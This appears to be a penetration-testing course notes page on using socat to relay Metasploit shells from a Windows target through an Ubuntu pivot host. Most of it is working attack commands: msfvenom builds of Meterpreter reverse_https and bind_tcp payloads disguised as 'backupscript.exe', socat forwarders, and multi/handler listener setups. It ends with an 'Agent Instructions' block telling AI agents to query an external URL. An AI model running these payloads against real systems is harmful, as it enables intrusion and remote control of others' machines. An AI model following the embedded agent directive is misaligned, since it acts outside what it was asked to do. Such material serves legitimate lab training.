# Playing Pong with Socat

## Socat Redirection with a Reverse Shell

[Socat](https://linux.die.net/man/1/socat) is a bidirectional relay tool that can create pipe sockets between `2` independent network channels without needing to use SSH tunneling.

We can start Metasploit's listener using the same command mentioned in the last section on our attack host, and we can start `socat` on the Ubuntu server.

```bash
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
```

Socat will listen on localhost on port `8080` and forward all the traffic to port `80` on our attack host (10.10.14.18).

We then create a payload for the Windows target that points at the Ubuntu server running socat and start our `multi_handler` on the attack machine

```bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<UbuntuIP> -f exe -o backupscript.exe LPORT=8080
```

(we need port 80)

```shell-session
sudo msfconsole

msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run
```

We can test this by running our payload on the windows host again, and we should see a network connection from the Ubuntu server this time.

## Socat Redirection with a Bind Shell

Similar to our socat's reverse shell redirector, we can also create a socat bind shell redirector. This is different from reverse shells that connect back from the Windows server to the Ubuntu server and get redirected to our attack host.

In the case of bind shells, the Windows server will start a listener and bind to a particular port. We can create a bind shell payload for Windows and execute it on the Windows host.

At the same time, we can create a socat redirector on the Ubuntu server, which will listen for incoming connections from a Metasploit bind handler and forward that to a bind shell payload on a Windows target. The below figure should explain the pivot in a much better way.

<figure><img src="/files/zfqRboPHMzBXI6Gk66Rr" alt=""><figcaption></figcaption></figure>

**Creating the Windows Payload**

```bash
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
```

We can start a `socat bind shell` listener, which listens on port `8080` and forwards packets to Windows server `8443`.

```shell-session
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
```

`172.16.5.19` is the Windows IP

```shell-session
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64
set LPORT 8080
run
```

**Establishing Meterpreter Session**

```shell-session
meterpreter > getuid
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.rtlcopymemory.com/pivoting-tunneling-and-port-forwarding/playing-pong-with-socat.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.